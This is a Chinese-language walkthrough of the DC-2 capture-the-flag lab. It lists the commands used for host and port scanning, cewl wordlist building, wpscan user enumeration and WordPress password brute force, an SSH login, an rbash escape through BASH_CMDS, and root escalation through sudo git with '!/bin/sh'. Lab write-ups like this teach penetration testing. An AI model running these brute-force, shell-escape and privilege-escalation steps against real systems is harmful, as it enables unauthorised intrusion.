测试靶场
1.探测靶机IP
arp-scan -l
2.探测靶机端口
nmap -A 192.168.192.132 -p 1-65535
发现开放了80端口,存在web服务,Apache/2.4.10,
发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1
3.访问web站点
访问失败,修改hosts文件
重新访问web站点,发现flag
Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。
cewl http://dc-2 -w passwd.txt 
4.扫描目录
dirb http://dc-2
网站我们拿到了 还需要账号,Wordpress有一个著名的扫描工具wpscan
wpscan --url http://dc-2/ -e u //枚举用户名字
admin、jerry、tom
创建字典,将三个用户名写入字典中
echo "admin" >>user.txt
echo "jerry" >>user.txt
echo "tom" >>user.txt5.爆破密码
完成后。使用wpscan爆破账号密码
wpscan --url http://dc-2/ -U user.txt -P passwd.txt
使用jerry登录成功。发现flag2提示我们用exp去打wordpress是不可能的,希望我们找另外一条路。
尝试用之前得到的用户名和密码登录ssh(7744),最终Tom登录成功
ssh jerry@192.168.192.132 -p 7744
ssh tom @192.168.192.132 -p 7744jerry登录失败
tom登录成功
查看当前目录下的文件,发现第三个flag,但是发现shell命令受限,不能查看
6.绕过
这里是rbash限制,需要绕过
==有很多不同的限制外壳可供选择。其中一些只是普通的shell,有一些简单的常见限制,实际上并不是可配置的,例如rbash(限制Bash)rzsh和rksh(受限模式下的Korn Shell),这些都非常容易绕过。其他人有一个完整的配置集,可以重新设计以满足管理员的需求,如lshell(Limited Shell)和rssh(Restricted Secure Shell)。
一旦配置可以被管理员收紧,可配置的shell就更难以绕过。在这些shell上绕过技术通常依赖于管理员有点被迫为普通用户提供某些不安全命令的事实。。如果在没有适当安全配置的情况下允许,它们会为攻击者提供升级权限的工具,有时还会向root用户升级。
其他原因是,有时管理员只是Linux系统管理员,而不是真正的安全专业人员,因此从渗透测试人员的角度来看,他们并不真正了解部队的方式,并最终允许太多危险命令。
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*成功绕过,查看flag3.txt提示我们要su 切换用户。
切换用户到jerry,并进入到jerry用户的目录,从查看文件,发现第4个flag
7.提权
flag4 提示我们可以使用git,我们可以通过git来提权
我们可以看到无需root权限,jerry 可以使用 git
sudo -l
查看一下可以使用的root权限命令
find / -user root -perm -4000 -print 2>/dev/null
发现可以使用git命令 (root权限)
使用git命令进行提取,直接输入!/bin/sh
sudo help git status 
提权成功
8.成功拿到FLAG
发现final-flag.txt
cd /root
cat final-flag.txt
959
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
